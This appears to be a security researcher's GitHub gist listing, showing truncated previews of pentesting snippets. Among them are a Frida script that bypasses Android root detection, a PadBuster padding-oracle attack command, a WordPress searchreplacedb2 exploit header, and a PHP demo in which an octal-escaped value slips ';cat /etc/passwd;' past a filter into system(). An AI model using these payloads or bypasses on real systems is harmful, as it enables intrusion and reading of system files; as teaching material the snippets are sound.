
LongCat pich4ya

@pich4ya
pich4ya / secureRootCert1.java
Last active November 29, 2019 07:30
How to avoid trusting all HTTPS certificates when connecting to an internal API whose server uses a certificate issued by an internal root CA
/*
Prerequisites
- Make sure you already have the root certificate file
- Set $JAVA_HOME to the correct location and make sure the file $JAVA_HOME/jre/lib/security/cacerts exists
- The Java keystore password is "changeit" by default
Steps
1. First, download or request the root certificate that will be used
Root certificates contain public information and CAs always make them available for anyone.
$ wget https://sth.sh/demo/STH_Root_CA.pem -O ca.pem
pich4ya / root_bypass.js
Created August 5, 2019 20:14
Bypass Android Root Detection / Bypass RootBeer - August 2019
// $ frida -l antiroot.js -U -f com.example.app --no-pause
// CHANGELOG by Pichaya Morimoto ([email protected]):
// - I added extra whitelisted items to deal with the latest versions
// of RootBeer/Cordova iRoot as of August 6, 2019
// - The original one just fucked up (kill itself) if Magisk is installed lol
// Credit & Originally written by: https://codeshare.frida.re/@dzonerzy/fridantiroot/
// If this isn't working in the future, check console logs, rootbeer src, or libtool-checker.so
Java.perform(function() {
var RootPackages = ["com.noshufou.android.su", "com.noshufou.android.su.elite", "eu.chainfire.supersu",
pich4ya / padbuster_macos2019.txt
Created August 5, 2019 08:22
Install PadBuster on macOS Mojave 10.14.5
brew install openssl
brew install perl
brew unlink perl && brew link perl
env LDFLAGS="-L$(brew --prefix openssl)/lib" CFLAGS="-I$(brew --prefix openssl)/include" perl -MCPAN -e 'install Crypt::SSLeay'
git clone https://github.com/GDSSecurity/PadBuster && cd PadBuster
perl padbuster.pl "https://example.local/ScriptResource.axd?d=yyy" yyy 16 -encoding 3 -bruteforce -log -verbose -cookies "ASP.NET_SessionId=xxx"
pich4ya / TouchID_for_sudo.txt
Last active September 5, 2019 07:50
macOS Touch ID for sudo in iTerm2
1. $ sudo vim /etc/pam.d/sudo
2. add this line on top of the content
auth sufficient pam_tid.so
3. save and quit (:w! then :q)
4. works now for Terminal, but for iTerm 2, go to top menu
pich4ya / Clutch.entitlements
Last active June 17, 2019 16:18
Killed: 9 on iPhone 6
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">
<plist version="1.0">
<dict>
<key>platform-application</key>
<true/>
<key>get-task-allow</key>
<true/>
<key>task_for_pid-allow</key>
<true/>

Keybase proof

I hereby claim:

  • I am pich4ya on github.
  • I am pichaya (https://keybase.io/pichaya) on keybase.
  • I have a public key ASAWUHK10DC94H4bI4qpXRsGFGypRqHnK3MPjvJZMnd1bwo

To claim this, I am signing this object:

<?php
// @author Pichaya Morimoto (Siam Thanat Hack Company Limited)
$file='image.png';
// Test input: octal escape sequences, which pass the digit/backslash-only filter below
$_GET['size']='\\473\\143\\141\\164\\40\\57\\145\\164\\143\\57\\160\\141\\163\\163\\167\\144\\473';
// The regex strips everything except digits and backslashes, but stripcslashes()
// then decodes the octal escapes back into arbitrary characters, so the value is
// still attacker-controlled when it is interpolated into the shell command below.
$e = stripcslashes(
    preg_replace('/[^0-9\\\]/',
        '',
        isset($_GET['size']) ? $_GET['size'] : '25')
);
echo system("convert $file --resize $e ./thumbs/$file");
pich4ya / พฤติมาตร.txt
Last active March 8, 2019 18:15
For educational purposes only. - https://www.blognone.com/node/108546 - [SHA-256: 8e686a74c47fb1733ed201b76f0a7cfaeed66140599b7b1043f905a7ad9b6044 - app-nbtc.apk / 1552060769 ]
1.) BackgroundServiceNew will be triggered through JobInfo.Builder(..) in:
com/electronicshell/nbtcconsult/QuestionActivity.java
34:import com.electronicshell.nbtcconsult.BackGroundUse.BackgroundServiceNew;
122: JobInfo jobInfo = new JobInfo.Builder(123, new ComponentName(context, BackgroundServiceNew.class)).setRequiresCharging(true).setRequiredNetworkType(1).setPersisted(true).setPeriodic(900000L).build();
com/electronicshell/nbtcconsult/BackGroundUse/BootDeviceReceiver.java
35:import com.electronicshell.nbtcconsult.BackGroundUse.BackgroundServiceNew;
91: JobInfo jobInfo = new JobInfo.Builder(123, new ComponentName(context, BackgroundServiceNew.class)).setRequiresCharging(true).setRequiredNetworkType(1).setPersisted(true).setPeriodic(900000L).build();
com/electronicshell/nbtcconsult/NewMenuActivity.java
pich4ya / ChangePassword.java
Created February 24, 2019 07:47 — forked from zach-klippenstein/ChangePassword.java
The keystore password on Java keystore files is utterly pointless. You can reset it without knowing it, as shown by this code. Note that private keys are still secure, as far as I know. The JKS implementation is copyright Casey Marshall ([email protected]), and the original source is available at http://metastatic.org/source/JKS.java. I've in…
import java.util.*;
import java.io.*;
import java.security.*;
public class ChangePassword
{
private final static JKS j = new JKS();
public static void main(String[] args) throws Exception
{
pich4ya / searchreplacedb2_exploit.py
Created February 20, 2019 01:26
Exploit for wpscan's searchreplacedb2.php (Safe Search and Replace version 2.0.1)
# @author longcat (Pichaya Morimoto / [email protected])
# update user's password hash using some match&replace magic
#
# Exploit for wpscan's command output:
# [+] http://<wp-site>/searchreplacedb2.php
# | Found By: Search Replace Db2 (Aggressive Detection)
# | Confidence: 100%
# | Reference: https://interconnectit.com/products/search-and-replace-for-wordpress-databases/
#
# Originally written by Lee Nichol